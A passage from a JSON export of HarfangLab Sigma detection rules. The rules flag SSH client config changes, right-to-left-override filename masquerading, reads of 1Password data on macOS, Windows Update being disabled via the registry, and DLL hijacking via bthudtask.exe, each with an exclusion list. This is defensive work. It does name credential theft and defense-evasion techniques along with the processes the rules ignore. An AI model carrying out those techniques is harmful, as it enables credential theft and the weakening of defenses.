"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ed4dcef-5d3f-4b96-9778-049416f24d30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297519Z",
"creation_date": "2026-03-23T11:45:35.297521Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297525Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_client_config_modified_linux.yml",
"content": "title: SSH Client Configuration Modified\nid: 5ed4dcef-5d3f-4b96-9778-049416f24d30\ndescription: |\n Detects an attempt to modify the content of the SSH client configuration file.\n The SSH client configuration contains the security settings used by SSH.\n An attacker can modify the SSH client configuration to achieve persistence.\n It is recommended to investigate the context in which these changes were made and eventually the SSH configuration itself for any suspicious configurations.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/ssh_config'\n - TargetPath: '/etc/ssh/ssh_config'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_chmod:\n Kind: 'chmod'\n\n exclusion_ssh:\n - ProcessImage: '/usr/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /usr/bin/dnf'\n - '/usr/bin/python* /bin/dnf'\n exclusion_apk:\n ProcessAncestors|contains: '/sbin/apk'\n exclusion_kaniko:\n ProcessAncestors|contains: '/kaniko/executor'\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_sed:\n ProcessCommandLine|startswith: 'sed -ne'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ed4dcef-5d3f-4b96-9778-049416f24d30",
"rule_name": "SSH Client Configuration Modified",
"rule_description": "Detects an attempt to modify the content of the SSH client configuration file.\nThe SSH client configuration contains the security settings used by SSH.\nAn attacker can modify the SSH client configuration to achieve persistence.\nIt is recommended to investigate the context in which these changes were made and eventually the SSH configuration itself for any suspicious configurations.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-06",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f065dc5-d8ee-441d-b1eb-51d0945edf2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069725Z",
"creation_date": "2026-03-23T11:45:34.069727Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069731Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.freecodecamp.org/news/rtlo-in-hacking/",
"https://attack.mitre.org/techniques/T1036/002/"
],
"name": "t1036_002_right_to_left_override.yml",
"content": "title: Right-to-Left Override Character Masquerading\nid: 5f065dc5-d8ee-441d-b1eb-51d0945edf2a\ndescription: |\n Detects a process containing the Right-to-Left Override (RLO) character (U+202E) in its command-line.\n RLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.\n Adversaries may abuse the RLO character to disguise a string and/or file name to make it appear benign.\n This technique is often used by attackers to make a user execute a malicious executable disguised as a media file (PDF, DOCX, etc.) as part of a phishing attack.\n It is recommended to investigate the legitimacy of the detected process, as well as the origin of the detected executable.\nreferences:\n - https://www.freecodecamp.org/news/rtlo-in-hacking/\n - https://attack.mitre.org/techniques/T1036/002/\ndate: 2025/10/21\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: ''\n\n exclusion_firefox:\n Image|endswith:\n - '\\firefox.exe'\n - '\\waterfox.exe'\n CommandLine|contains|all:\n - '-intPrefs'\n - '-contentproc'\n - '-isForBrowser'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f065dc5-d8ee-441d-b1eb-51d0945edf2a",
"rule_name": "Right-to-Left Override Character Masquerading",
"rule_description": "Detects a process containing the Right-to-Left Override (RLO) character (U+202E) in its command-line.\nRLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.\nAdversaries may abuse the RLO character to disguise a string and/or file name to make it appear benign.\nThis technique is often used by attackers to make a user execute a malicious executable disguised as a media file (PDF, DOCX, etc.) as part of a phishing attack.\nIt is recommended to investigate the legitimacy of the detected process, as well as the origin of the detected executable.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f0f143a-fd02-4927-a0c4-9cbad45d0ade",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617607Z",
"creation_date": "2026-03-23T11:45:34.617609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617613Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1552_004_read_1password_sensitive_files_macos.yml",
"content": "title: Suspicious Access to 1Password Sensitive Files\nid: 5f0f143a-fd02-4927-a0c4-9cbad45d0ade\ndescription: |\n Detects a process reading sensitive files related to the 1Password password manager.\n Adversaries may read the user's password in order to gather credentials and impersonate users on multiple services.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Application Support/1Password/'\n ProcessImage|contains: '?'\n\n filter_1password:\n Image:\n - '/Applications/1Password.app/Contents/*'\n - '/Users/*/Applications/1Password.app/Contents/*'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f0f143a-fd02-4927-a0c4-9cbad45d0ade",
"rule_name": "Suspicious Access to 1Password Sensitive Files",
"rule_description": "Detects a process reading sensitive files related to the 1Password password manager.\nAdversaries may read the user's password in order to gather credentials and impersonate users on multiple services.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f142996-9dfb-41b9-8493-a4b55a4f6ebe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621296Z",
"creation_date": "2026-03-23T11:45:34.621298Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621302Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_autoupdate_registry.yml",
"content": "title: Windows Update Disabled via Registry\nid: 5f142996-9dfb-41b9-8493-a4b55a4f6ebe\ndescription: |\n Detects when Windows updates are disabled by setting a specific registry key.\n Adversaries may disable Windows automatic updates to weaken the security level of the target during long time engagement.\n It is recommended to check if this action is intended or if updates are installed by another mean on the impacted system.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoUpdate'\n Details|contains: '?WORD' # Any non-zero value works, not just DWORD (0x00000001)\n ProcessParentImage|contains: '?'\n\n filter_zero:\n Details: '?WORD (0x00000000)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_image:\n - ProcessImage: '?:\\Windows\\System32\\uwfmgr.exe'\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\wapt\\waptservice.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\\\*\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Windows\\Action1\\action1_agent.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessCommandLine|contains|all:\n - ' /o '\n - ' /c /b'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n\n exclusion_centrastage1:\n ProcessProcessName: 'CagService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Datto Inc'\n exclusion_centrastage2:\n ProcessParentCommandLine|startswith:\n - 'powershell -executionpolicy bypass & ??:\\ProgramData\\CentraStage\\Packages\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\ProgramData\\CentraStage\\Packages\\'\n\n exclusion_patchman:\n ProcessProcessName: 'PME.Agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n exclusion_fsecure:\n ProcessProcessName: 'fssua.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WithSecure Oyj'\n - 'F-Secure Corporation'\n\n exclusion_ninjarmmagent:\n ProcessImage|endswith: '\\NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NinjaRMM, LLC'\n\n exclusion_labtech:\n ProcessImage|endswith: '\\LTSVC.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectwise, LLC'\n\n exclusion_zoomroom:\n ProcessImage|endswith:\n - '\\zJob.exe'\n - '\\ZoomRooms.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n\n exclusion_winbootstrap:\n - ProcessParentImage|endswith: '\\TSManager.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n - ProcessParentImage|endswith: 'TSMBootstrap.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n - ProcessGrandparentImage|endswith: '\\TSManager.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n - ProcessGrandparentImage|endswith: 'TSMBootstrap.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_automox:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\Automox\\amagent.exe'\n - '?:\\Program Files\\Automox\\amagent.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Automox Inc.'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\Automox\\amagent.exe'\n - '?:\\Program Files\\Automox\\amagent.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Automox Inc.'\n\n exclusion_mmragent:\n ProcessImage: '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\emulator\\MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ninjarmm:\n ProcessName: 'NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NinjaOne LLC'\n\n exclusion_netfxemulator:\n ProcessName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n - ProcessName: 'setup*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Matrix42 GmbH'\n - ProcessGrandparentProduct: 'Matrix42 Empirum'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Matrix42 GmbH'\n\n exclusion_serviceportalagent:\n ProcessName: 'ServicePortalAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f142996-9dfb-41b9-8493-a4b55a4f6ebe",
"rule_name": "Windows Update Disabled via Registry",
"rule_description": "Detects when Windows updates are disabled by setting a specific registry key.\nAdversaries may disable Windows automatic updates to weaken the security level of the target during long time engagement.\nIt is recommended to check if this action is intended or if updates are installed by another mean on the impacted system.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f3ad336-0099-4bfb-af9d-258421e51d68",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593036Z",
"creation_date": "2026-03-23T11:45:34.593040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593047Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bthudtask.yml",
"content": "title: DLL Hijacking via bthudtask.exe\nid: 5f3ad336-0099-4bfb-af9d-258421e51d68\ndescription: |\n Detects potential Windows DLL Hijacking via bthudtask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bthudtask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f3ad336-0099-4bfb-af9d-258421e51d68",
"rule_name": "DLL Hijacking via bthudtask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bthudtask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f492e12-e643-41a2-a377-b8d8a2886883",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
